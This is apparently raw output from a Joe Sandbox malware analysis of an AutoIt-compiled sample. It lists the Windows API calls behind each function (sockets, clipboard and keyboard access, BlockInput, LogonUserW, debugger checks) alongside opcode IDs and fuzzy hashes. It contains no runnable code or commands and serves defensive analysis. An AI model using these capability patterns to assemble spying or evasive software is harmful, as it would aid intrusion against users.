                                                            • closesocket.WSOCK32(00000000), ref: 004653BD
                                                            Similarity
                                                            • API ID: ErrorLast$closesocket$bindlistensocket
                                                            • String ID:
                                                            • API String ID: 540024437-0
                                                            • Opcode ID: 56b395d1b7441155ee1d78469f99a9871a9e2360f64803e3ab449944eb02724f
                                                            • Instruction ID: 689f190a2b8ca197395c4559ba4ec64c13dad074e2778b61c05f6be918bdb8b0
                                                            • Opcode Fuzzy Hash: 56b395d1b7441155ee1d78469f99a9871a9e2360f64803e3ab449944eb02724f
                                                            • Instruction Fuzzy Hash: A8319331200500ABD310EF25DD89B6EB7A8EF44725F10866EF855E73D1DBB4AC818B99
                                                            Strings
                                                            Similarity
                                                            • API ID:
                                                            • String ID: ERCP$VUUU$VUUU$VUUU$XjH
                                                            • API String ID: 0-2872873767
                                                            • Opcode ID: 34fecdbc504fccc055e136d4951117c2a740426f4eee1b738e863fbded63ce7f
                                                            • Instruction ID: d175e7d0ae6fb3d700f9da8fb6b70819649eb02c4ceaf458d011f7582104736e
                                                            • Opcode Fuzzy Hash: 34fecdbc504fccc055e136d4951117c2a740426f4eee1b738e863fbded63ce7f
                                                            • Instruction Fuzzy Hash: D772D871A042198BEF24CF58C8807AEB7F1EB42314F25829BD859A7380D7799DC5CF5A
                                                            APIs
                                                            • CreateToolhelp32Snapshot.KERNEL32 ref: 00475608
                                                            • Process32FirstW.KERNEL32(00000000,0000022C), ref: 00475618
                                                            • __wsplitpath.LIBCMT ref: 00475644
                                                              • Part of subcall function 00413A0E: __wsplitpath_helper.LIBCMT ref: 00413A50
                                                            • _wcscat.LIBCMT ref: 00475657
                                                            • __wcsicoll.LIBCMT ref: 0047567B
                                                            • Process32NextW.KERNEL32(00000000,?), ref: 004756AB
                                                            • CloseHandle.KERNEL32(00000000), ref: 004756BA
                                                            Similarity
                                                            • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wcsicoll__wsplitpath__wsplitpath_helper_wcscat
                                                            • String ID:
                                                            • API String ID: 2547909840-0
                                                            • Opcode ID: 9e44ac92eedd99fdf3f2932738b6949334d3f24a3592eb41664da5fdf167909f
                                                            • Instruction ID: 52239f647ae7113ca4c6e3167181772f82882466072c53a1302db900a9aecbbd
                                                            • Opcode Fuzzy Hash: 9e44ac92eedd99fdf3f2932738b6949334d3f24a3592eb41664da5fdf167909f
                                                            • Instruction Fuzzy Hash: B3518671900618ABDB10DF55CD85FDE77B8EF44704F1084AAF509AB282DA75AF84CF68
                                                            APIs
                                                              • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                              • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                            • FindFirstFileW.KERNEL32(?,?), ref: 004524DF
                                                            • Sleep.KERNEL32(0000000A), ref: 0045250B
                                                            • FindNextFileW.KERNEL32(?,?), ref: 004525E9
                                                            • FindClose.KERNEL32(?), ref: 004525FF
                                                            Strings
                                                            Similarity
                                                            • API ID: Find$File$CloseFirstNextSleep_memmove_wcslen
                                                            • String ID: *.*$\VH
                                                            • API String ID: 2786137511-2657498754
                                                            • Opcode ID: 952b61541a12346a9a2631e93aef0720ba9757898c7ad2f9180af277910d7a38
                                                            • Instruction ID: de376bcde865418ddd8e10142a6165d1fec8b8ecf5afc9fd422e88b207ce0255
                                                            • Opcode Fuzzy Hash: 952b61541a12346a9a2631e93aef0720ba9757898c7ad2f9180af277910d7a38
                                                            • Instruction Fuzzy Hash: 37417F7190021DABDB14DF64CD58AEE77B4AF49305F14445BEC09A3281E678EE49CB98
                                                            APIs
                                                            • IsDebuggerPresent.KERNEL32 ref: 00421FC1
                                                            • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00421FD6
                                                            • UnhandledExceptionFilter.KERNEL32(pqI), ref: 00421FE1
                                                            • GetCurrentProcess.KERNEL32(C0000409), ref: 00421FFD
                                                            • TerminateProcess.KERNEL32(00000000), ref: 00422004
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                            • String ID: pqI
                                                            • API String ID: 2579439406-2459173057
                                                            • Opcode ID: 25dc777f16e4295b66819c01749bb17431433dcbcd396824bac5e12fb106518c
                                                            • Instruction ID: 2caf929301e55fbdfba35cdc3931bb3174c20cf3198a7c5bb5494214f042e870
                                                            • Opcode Fuzzy Hash: 25dc777f16e4295b66819c01749bb17431433dcbcd396824bac5e12fb106518c
                                                            • Instruction Fuzzy Hash: 9E21CDB45392059FCB50DF65FE456483BA4BB68304F5005BBF90987371E7B969818F0D
                                                            APIs
                                                            • __wcsicoll.LIBCMT ref: 00433349
                                                            • mouse_event.USER32(00000800,00000000,00000000,00000078,00000000), ref: 0043335F
                                                            • __wcsicoll.LIBCMT ref: 00433375
                                                            • mouse_event.USER32(00000800,00000000,00000000,00000088,00000000), ref: 0043338B
                                                            Strings
                                                            Similarity
                                                            • API ID: __wcsicollmouse_event
                                                            • String ID: DOWN
                                                            • API String ID: 1033544147-711622031
                                                            • Opcode ID: 3af7a305a716ba131119f47d61043d9bc75f7fbd5de0530911e4e2de0579c383
                                                            • Instruction ID: c5effa3e7e2998e6ee15a8e10ce6e2e5d36a5fc043d4170c53cc9f091e4fe068
                                                            • Opcode Fuzzy Hash: 3af7a305a716ba131119f47d61043d9bc75f7fbd5de0530911e4e2de0579c383
                                                            • Instruction Fuzzy Hash: 78F0A0726846103AF80026947C02EFB334C9B26767F004023FE0CD1280EA59290557BD
                                                            APIs
                                                            • GetKeyboardState.USER32(?), ref: 0044C3D2
                                                            • SetKeyboardState.USER32(00000080), ref: 0044C3F6
                                                            • PostMessageW.USER32(00000000,00000101,?,?), ref: 0044C43A
                                                            • PostMessageW.USER32(00000000,00000105,?,?), ref: 0044C472
                                                            • SendInput.USER32(00000001,?,0000001C), ref: 0044C4FF
                                                            Similarity
                                                            • API ID: KeyboardMessagePostState$InputSend
                                                            • String ID:
                                                            • API String ID: 3031425849-0
                                                            • Opcode ID: 0ab52cc7f1a00f618f34bf6b1006ae93bda3478e58ada741bb1ac89fd44d8d1c
                                                            • Instruction ID: ca9f4cb769efad0e1be190fe8763212e5a79bd7c4ee8908ff6f5a5d8a4a0dc9b
                                                            • Opcode Fuzzy Hash: 0ab52cc7f1a00f618f34bf6b1006ae93bda3478e58ada741bb1ac89fd44d8d1c
                                                            • Instruction Fuzzy Hash: 4D415D755001082AEB109FA9DCD5BFFBB68AF96320F04815BFD8456283C378D9518BF8
                                                            APIs
                                                              • Part of subcall function 00465225: inet_addr.WSOCK32(?), ref: 00465249
                                                            • socket.WSOCK32(00000002,00000002,00000011), ref: 0047666F
                                                            • WSAGetLastError.WSOCK32(00000000), ref: 00476692
                                                            Similarity
                                                            • API ID: ErrorLastinet_addrsocket
                                                            • String ID:
                                                            • API String ID: 4170576061-0
                                                            • Opcode ID: beba4ad3326242fe02a37a331f69581919bdb462f679bf8c0e3d41d719e28549
                                                            • Instruction ID: b6cffcacb6afaf0b8cd9bee7f3c7ce362d61c656181a10c6507bcc72ef542d5a
                                                            • Opcode Fuzzy Hash: beba4ad3326242fe02a37a331f69581919bdb462f679bf8c0e3d41d719e28549
                                                            • Instruction Fuzzy Hash: 604129326002005BD710EF39DC86F5A73D59F44728F15866FF944AB3C2DABAEC418799
                                                            APIs
                                                              • Part of subcall function 0046F3C1: IsWindow.USER32(00000000), ref: 0046F3F1
                                                            • IsWindowVisible.USER32 ref: 0047A368
                                                            • IsWindowEnabled.USER32 ref: 0047A378
                                                            • GetForegroundWindow.USER32(?,?,?,00000001), ref: 0047A385
                                                            • IsIconic.USER32 ref: 0047A393
                                                            • IsZoomed.USER32 ref: 0047A3A1
                                                            Similarity
                                                            • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                                            • String ID:
                                                            • API String ID: 292994002-0
                                                            • Opcode ID: 0a48a302b729025e65be405b7f5f19fe679dbad6397f14c7d9a4bdd7ec3e43df
                                                            • Instruction ID: 143e3079ffab126fd184b85051f6534cdea6adf6d01d93e69c1b4810180b6228
                                                            • Opcode Fuzzy Hash: 0a48a302b729025e65be405b7f5f19fe679dbad6397f14c7d9a4bdd7ec3e43df
                                                            • Instruction Fuzzy Hash: 8F11A2322001119BE3219F2ADC05B9FB798AF80715F15842FF849E7250DBB8E85187A9
                                                            APIs
                                                              • Part of subcall function 004426CD: _wcslen.LIBCMT ref: 004426F9
                                                            • CoInitialize.OLE32(00000000), ref: 00478442
                                                            • CoCreateInstance.OLE32(00482A08,00000000,00000001,004828A8,?), ref: 0047845B
                                                            • CoUninitialize.OLE32 ref: 0047863C
                                                            Strings
                                                            Similarity
                                                            • API ID: CreateInitializeInstanceUninitialize_wcslen
                                                            • String ID: .lnk
                                                            • API String ID: 886957087-24824748
                                                            • Opcode ID: a78490bbd6710ed4fb80770143ba5b6b6d69e34379d2ac1719b679a46047f49b
                                                            • Instruction ID: cf4755465b87a828534c2837f83e1451e93ee4f6fe559e45c0b7480b45348b92
                                                            • Opcode Fuzzy Hash: a78490bbd6710ed4fb80770143ba5b6b6d69e34379d2ac1719b679a46047f49b
                                                            • Instruction Fuzzy Hash: 17816D70344301AFD210EB54CC82F5AB3E5AFC8B18F10896EF658DB2D1DAB5E945CB96
                                                            APIs
                                                            • OpenClipboard.USER32(?), ref: 0046DCE7
                                                            • IsClipboardFormatAvailable.USER32(0000000D), ref: 0046DCF5
                                                            • GetClipboardData.USER32(0000000D), ref: 0046DD01
                                                            • CloseClipboard.USER32 ref: 0046DD0D
                                                            • GlobalLock.KERNEL32(00000000), ref: 0046DD37
                                                            • CloseClipboard.USER32 ref: 0046DD41
                                                            • IsClipboardFormatAvailable.USER32(00000001), ref: 0046DD81
                                                            • GetClipboardData.USER32(00000001), ref: 0046DD8D
                                                            • CloseClipboard.USER32 ref: 0046DD99
                                                            Similarity
                                                            • API ID: Clipboard$Close$AvailableDataFormat$GlobalLockOpen
                                                            • String ID:
                                                            • API String ID: 15083398-0
                                                            • Opcode ID: 15add7cba21d4e7b0994eb4f29ae7fc89ecef22f443925247f1b4e4ac981ab14
                                                            • Instruction ID: df02eb04a95629b292fb88db9571ebb8a4b5ed240788a0c572d8156b6d3d2bc0
                                                            • Opcode Fuzzy Hash: 15add7cba21d4e7b0994eb4f29ae7fc89ecef22f443925247f1b4e4ac981ab14
                                                            • Instruction Fuzzy Hash: 1A0128326042416BC311BBB99C8596E7B64EF4A324F04097FF984A72C1EB74A912C3A9
                                                            APIs
                                                            Strings
                                                            Similarity
                                                            • API ID: _memmove
                                                            • String ID: U$\
                                                            • API String ID: 4104443479-100911408
                                                            • Opcode ID: 8409e1e1a3b6e8568ef346b3eec2e6609d783923d36277a6c09bfee55c093031
                                                            • Instruction ID: 961864e7757f6edfa256f53df2fe8495351bb1c33360f7104140ceff5b52ad59
                                                            • Opcode Fuzzy Hash: 8409e1e1a3b6e8568ef346b3eec2e6609d783923d36277a6c09bfee55c093031
                                                            • Instruction Fuzzy Hash: 7002A070E002499FEF28CF69C4907AEBBF2AF95304F2481AED45297381D7396D4ACB55
                                                            APIs
                                                            • FindFirstFileW.KERNEL32(00000000,?,?), ref: 0045CB1F
                                                            • FindNextFileW.KERNEL32(00000000,?), ref: 0045CB7C
                                                            • FindClose.KERNEL32(00000000,00000001,00000000), ref: 0045CBAB
                                                            Similarity
                                                            • API ID: Find$File$CloseFirstNext
                                                            • String ID:
                                                            • API String ID: 3541575487-0
                                                            • Opcode ID: b82a98c6df9a243ef4fbf3c667c5144d50f68704456ba494e21579813087d3e5
                                                            • Instruction ID: f333144462bda28c064cc07c1e05bb1389ec512a64b809c533c1c3d7cc497df0
                                                            • Opcode Fuzzy Hash: b82a98c6df9a243ef4fbf3c667c5144d50f68704456ba494e21579813087d3e5
                                                            • Instruction Fuzzy Hash: 6741DF716003019FC710EF69D881A9BB3E5FF89315F108A6EE9698B351DB75F844CB94
                                                            APIs
                                                            • GetFileAttributesW.KERNEL32(?,00000000), ref: 004339C7
                                                            • FindFirstFileW.KERNEL32(?,?), ref: 004339D8
                                                            • FindClose.KERNEL32(00000000), ref: 004339EB
                                                            Similarity
                                                            • API ID: FileFind$AttributesCloseFirst
                                                            • String ID:
                                                            • API String ID: 48322524-0
                                                            • Opcode ID: 957631a30c41d6cd228e989780156951a90b63876f33aac8b2b1d3c9657f363e
                                                            • Instruction ID: b419dbaef297d354eb99830e4178f101d1a7f75c7260f3cbf0392e7d05c3e8e7
                                                            • Opcode Fuzzy Hash: 957631a30c41d6cd228e989780156951a90b63876f33aac8b2b1d3c9657f363e
                                                            • Instruction Fuzzy Hash: 22E092328145189B8610AA78AC0D4EE779CDF0A236F100B56FE38C21E0D7B49A9047DA
                                                            APIs
                                                            • InternetQueryDataAvailable.WININET(?,?,00000000,00000000), ref: 0044231E
                                                            • InternetReadFile.WININET(?,00000000,?,?), ref: 00442356
                                                              • Part of subcall function 004422CB: GetLastError.KERNEL32 ref: 004422E1
                                                            Similarity
                                                            • API ID: Internet$AvailableDataErrorFileLastQueryRead
                                                            • String ID:
                                                            • API String ID: 901099227-0
                                                            APIs
                                                            • DefDlgProcW.USER32(?,?,?,?), ref: 0047EA9E
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: Proc
                                                            • String ID:
                                                            • API String ID: 2346855178-0
                                                            APIs
                                                            • BlockInput.USER32(00000001), ref: 0045A38B
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: BlockInput
                                                            • String ID:
                                                            • API String ID: 3456056419-0
                                                            APIs
                                                            • LogonUserW.ADVAPI32(?,?,?,?,00000000,?), ref: 00436CF9
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: LogonUser
                                                            • String ID:
                                                            • API String ID: 1244722697-0
                                                            APIs
                                                            • GetUserNameW.ADVAPI32(?,?), ref: 00472C51
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: NameUser
                                                            • String ID:
                                                            • API String ID: 2645101109-0
                                                            APIs
                                                            • SetUnhandledExceptionFilter.KERNEL32(Function_0001F20E), ref: 0041F255
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: ExceptionFilterUnhandled
                                                            • String ID:
                                                            • API String ID: 3192549508-0
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: N@
                                                            • API String ID: 0-1509896676
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681999873.0000000002E70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E70000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_2e70000_H1CYDJ8LQe.jbxd
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681999873.0000000002E70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E70000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_2e70000_H1CYDJ8LQe.jbxd
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681999873.0000000002E70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E70000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_2e70000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681999873.0000000002E70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E70000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_2e70000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            APIs
                                                            • DeleteObject.GDI32(?), ref: 0045953B
                                                            • DeleteObject.GDI32(?), ref: 00459551
                                                            • DestroyWindow.USER32(?), ref: 00459563
                                                            • GetDesktopWindow.USER32 ref: 00459581
                                                            • GetWindowRect.USER32(00000000), ref: 00459588
                                                            • SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 0045969E
                                                            • AdjustWindowRectEx.USER32(?,88C00000,00000000,?), ref: 004596AC
                                                            • CreateWindowExW.USER32(?,AutoIt v3,00000000,?,88C00000,00000002,00000007,?,?,?,00000000,00000000), ref: 004596E8
                                                            • GetClientRect.USER32(00000000,?), ref: 004596F8
                                                            • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,?,00000000,00000000,00000000), ref: 0045973B
                                                            • CreateFileW.KERNEL32(00000000,000001F4,80000000,00000000,00000000,00000003,00000000,00000000), ref: 00459760
                                                            • GetFileSize.KERNEL32(00000000,00000000), ref: 0045977B
                                                            • GlobalAlloc.KERNEL32(00000002,00000000), ref: 00459786
                                                            • GlobalLock.KERNEL32(00000000), ref: 0045978F
                                                            • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 0045979E
                                                            • GlobalUnlock.KERNEL32(00000000), ref: 004597A5
                                                            • CloseHandle.KERNEL32(00000000), ref: 004597AC
                                                            • CreateStreamOnHGlobal.OLE32(00000000,00000001,000001F4), ref: 004597B9
                                                            • OleLoadPicture.OLEAUT32(000001F4,00000000,00000000,004829F8,00000000), ref: 004597D0
                                                            • GlobalFree.KERNEL32(00000000), ref: 004597E2
                                                            • CopyImage.USER32(50000001,00000000,00000000,00000000,00002000), ref: 0045980E
                                                            • SendMessageW.USER32(00000000,00000172,00000000,50000001), ref: 00459831
                                                            • SetWindowPos.USER32(00000000,00000000,00000000,00000000,?,?,00000020), ref: 00459857
                                                            • ShowWindow.USER32(?,00000004), ref: 00459865
                                                            • CreateWindowExW.USER32(00000000,static,00000000,000001F4,50000001,0000000B,0000000B,?,?,?,00000000,00000000), ref: 004598AF
                                                            • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 004598C3
                                                            • GetStockObject.GDI32(00000011), ref: 004598CD
                                                            • SelectObject.GDI32(00000000,00000000), ref: 004598D5
                                                            • GetTextFaceW.GDI32(00000000,00000040,?), ref: 004598E5
                                                            • GetDeviceCaps.GDI32(00000000,0000005A), ref: 004598EE
                                                            • DeleteDC.GDI32(00000000), ref: 004598F8
                                                            • _wcslen.LIBCMT ref: 00459916
                                                            • _wcscpy.LIBCMT ref: 0045993A
                                                            • CreateFontW.GDI32(?,00000000,00000000,00000000,00000190,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 004599DB
                                                            • SendMessageW.USER32(00000000,00000030,00000000,00000001), ref: 004599EF
                                                            • GetDC.USER32(00000000), ref: 004599FC
                                                            • SelectObject.GDI32(00000000,?), ref: 00459A0C
                                                            • SelectObject.GDI32(00000000,00000007), ref: 00459A37
                                                            • ReleaseDC.USER32(00000000,00000000), ref: 00459A42
                                                            • MoveWindow.USER32(00000000,0000000B,?,?,00000190,00000001), ref: 00459A5F
                                                            • ShowWindow.USER32(?,00000004,?,00000000,00000000,00000000,00000190,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 00459A6D
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: Window$Create$Object$Global$Rect$DeleteFileSelect$MessageSendShow$AdjustAllocCapsClientCloseCopyDesktopDestroyDeviceFaceFontFreeHandleImageLoadLockMovePictureReadReleaseSizeStockStreamTextUnlock_wcscpy_wcslen
                                                            • String ID: $AutoIt v3$DISPLAY$static
                                                            • API String ID: 4040870279-2373415609
                                                            APIs
                                                            • GetSysColor.USER32(00000012), ref: 0044181E
                                                            • SetTextColor.GDI32(?,?), ref: 00441826
                                                            • GetSysColorBrush.USER32(0000000F), ref: 0044183D
                                                            • GetSysColor.USER32(0000000F), ref: 00441849
                                                            • SetBkColor.GDI32(?,?), ref: 00441864
                                                            • SelectObject.GDI32(?,?), ref: 00441874
                                                            • InflateRect.USER32(?,000000FF,000000FF), ref: 004418AA
                                                            • GetSysColor.USER32(00000010), ref: 004418B2
                                                            • CreateSolidBrush.GDI32(00000000), ref: 004418B9
                                                            • FrameRect.USER32(?,?,00000000), ref: 004418CA
                                                            • DeleteObject.GDI32(?), ref: 004418D5
                                                            • InflateRect.USER32(?,000000FE,000000FE), ref: 0044192F
                                                            • FillRect.USER32(?,?,?), ref: 00441970
                                                              • Part of subcall function 004308EF: GetSysColor.USER32(0000000E), ref: 00430913
                                                              • Part of subcall function 004308EF: SetTextColor.GDI32(?,00000000), ref: 0043091B
                                                              • Part of subcall function 004308EF: GetSysColorBrush.USER32(0000000F), ref: 0043094E
                                                              • Part of subcall function 004308EF: GetSysColor.USER32(0000000F), ref: 00430959
                                                              • Part of subcall function 004308EF: GetSysColor.USER32(00000011), ref: 00430979
                                                              • Part of subcall function 004308EF: CreatePen.GDI32(00000000,00000001,00743C00), ref: 0043098B
                                                              • Part of subcall function 004308EF: SelectObject.GDI32(?,00000000), ref: 0043099C
                                                              • Part of subcall function 004308EF: SetBkColor.GDI32(?,?), ref: 004309A6
                                                              • Part of subcall function 004308EF: SelectObject.GDI32(?,?), ref: 004309B4
                                                              • Part of subcall function 004308EF: InflateRect.USER32(?,000000FF,000000FF), ref: 004309D9
                                                              • Part of subcall function 004308EF: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 004309F4
                                                              • Part of subcall function 004308EF: GetWindowLongW.USER32(?,000000F0), ref: 00430A09
                                                              • Part of subcall function 004308EF: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00430A29
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: Color$Rect$Object$BrushInflateSelect$CreateText$DeleteFillFrameLongMessageRoundSendSolidWindow
                                                            • String ID:
                                                            • API String ID: 69173610-0
                                                            APIs
                                                            • DestroyWindow.USER32(?), ref: 004590F2
                                                            • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 004591AF
                                                            • SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 004591EF
                                                            • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000008), ref: 00459200
                                                            • CreateWindowExW.USER32(00000008,AutoIt v3,00000000,?,88C00000,?,?,?,00000001,?,00000000,00000000), ref: 00459242
                                                            • GetClientRect.USER32(00000000,?), ref: 0045924E
                                                            • CreateWindowExW.USER32(00000000,static,00000000,?,50000000,?,00000004,00000500,00000018,?,00000000,00000000), ref: 00459290
                                                            • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 004592A2
                                                            • GetStockObject.GDI32(00000011), ref: 004592AC
                                                            • SelectObject.GDI32(00000000,00000000), ref: 004592B4
                                                            • GetTextFaceW.GDI32(00000000,00000040,?), ref: 004592C4
                                                            • GetDeviceCaps.GDI32(00000000,0000005A), ref: 004592CD
                                                            • DeleteDC.GDI32(00000000), ref: 004592D6
                                                            • CreateFontW.GDI32(?,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 0045931C
                                                            • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00459334
                                                            • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,?,00000000,00000000,00000000), ref: 0045936E
                                                            • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00459382
                                                            • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00459393
                                                            • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,?,00000000,00000000,00000000), ref: 004593C8
                                                            • GetStockObject.GDI32(00000011), ref: 004593D3
                                                            • SendMessageW.USER32(?,00000030,00000000), ref: 004593E3
                                                            • ShowWindow.USER32(?,00000004,?,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 004593EE
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmp
